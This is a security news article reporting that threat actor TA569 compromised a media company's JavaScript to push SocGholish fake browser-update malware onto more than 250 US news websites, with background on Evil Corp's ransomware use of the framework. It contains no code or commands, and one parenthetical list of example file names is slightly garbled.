Hundreds of US news sites spread malware in supply chain attacks


Threat actors use the compromised infrastructure of an unnamed media company to deploy the SocGholish (aka FakeUpdates) JavaScript malware framework on the websites of hundreds of newspapers in the United States

“The media company in question is a company that provides both video content and advertising to major news outlets. [It] serves many different companies in different markets across the United States,” Sherrod DeGrippo, vice president of threat research and detection at Proofpoint, told BleepingComputer.

The threat actor behind this supply chain attack (tracked by Proofpoint as TA569) injected malicious code into a harmless JavaScript file that is loaded by news outlet websites.

This malicious JavaScript file is used to install SocGholish, which infects those who visit the compromised websites with malware payloads disguised as fake browser updates and delivered as ZIP archives (e.g. zip, Opera. Updа, via fake update alerts.

“Proofpoint Threat Research observed intermittent injections at a media company that supplies many major news outlets. This media company serves content to its partners via Javascript,” according to Proofpoint’s Threat Insight team uncovered today in a twitter thread.

“By changing the codebase of this otherwise benign JS, it is now used to deploy SocGholish.”

Malicious JavaScript file obfuscated content
Malicious JavaScript file obfuscated content (BleepingComputer)

In total, the malware was installed on websites of more than 250 US news outlets, some of which are major news organizations, according to security researchers from corporate security firm Proofpoint.

While the total number of affected news organizations is currently unknown, Proofpoint says it is aware of affected media organizations (including national news outlets) from New York, Boston, Chicago, Miami, Washington, DC, and others.

“TA569 has previously used media resources to spread SocGholish, and this malware can lead to secondary infections, including potential ransomware,” DeGrippo also told BleepingComputer.

“The situation needs to be closely monitored as Proofpoint has observed TA569 re-infecting the same assets just days after remediation.”

Link to ransomware attacks

Proofpoint has previously observed SocGholish campaigns that used fake updates and website redirects to infect users, including in some cases ransomware payloads.

Cybercrime gang Evil Corp also used SocGholish in a very similar campaign to infect the employees of more than 30 large US private companies via fake software update alerts sent through dozens of compromised US newspaper websites.

The infected computers were later used as a springboard into employers’ corporate networks in attacks attempting to deploy the gang’s WastedLocker ransomware.

Fortunately, Symantec revealed in a report that it blocked Evil Corp’s attempts to encrypt the breached networks in attacks targeting several private companies, including 30 US companies, eight of them Fortune 500 companies.

SocGholish was also recently used for backdoor networks infected with Raspberry Robin malware, in what Microsoft called Evil Corp’s pre-ransomware behavior.

Update Nov. 2 6:22 p.m. EDT: Added Proofpoint statement.


Leave a Reply

Your email address will not be published. Required fields are marked *